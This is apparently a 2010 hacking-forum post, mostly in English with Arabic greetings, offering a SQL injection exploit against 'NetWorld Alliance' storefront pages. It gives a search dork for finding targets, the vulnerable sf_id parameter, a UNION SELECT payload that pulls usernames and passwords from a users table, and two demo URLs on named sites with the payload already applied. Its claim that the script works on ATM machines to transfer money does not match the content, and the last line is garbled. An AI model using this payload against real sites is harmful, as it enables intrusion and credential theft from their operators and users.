السلام عليكم ورحمة الله وبركاته
الحمد لله اليوم اكتشفت ثلاث ثغرات
هذه هي الثالثة لعيونك يا [you]
كود PHP:
# Exploit Title: NetWorld Alliance SQL InJection
# Date: 27/06/2010
# Author: dev!l ghost
# Email: aws(at)live(dot)it
# Site : www.vbspiders.com
# Script url: http://www.networldalliance.com/2010-digital-signage-future-trends-report
# Price: US$797.00
# Version: N/A
# Tested on: Windows
# CVE : ()
:::::::::::::::::::::::::
=================Exploit=================
Descript: This Script Is For ATM Machine And How To use it and give and
get and transfer money from it
it is private script
---DorK:("© 2010 NetWorld Alliance")---
You will get a lot of sites enter any site
and then Put this (storefronts.php?sf_id=any number)
after id put any number and start inject
----exploit----
{{exploit}}
http://www.xxxxxx.com/storefronts.php?sf_id=(39) --SQLI--
after the number put this
(+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--)
DeMo1
https://www.kioskmarketplace.com/storefronts.php?sf_id=-39+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--
DeMo2
http://www.digitalsignagetoday.com/storefronts.php?sf_id=-243+union+all+select+1,concat(id,0x3a,username,0x3a,password)+from+bg_users--
---------greatz----------
Greatz to all my frinds and the all muslims
and Golden Ice and mr.ip
and the all who know me
And VBspiders
thank you
وشكرا لكم اه نسيت ورابط الثغرة
Dev!l Ghost
يالله السلام عليكم مع ثغرة جديدة
حياك الله [you]
ehge eyvm td hgd,l g; FyouD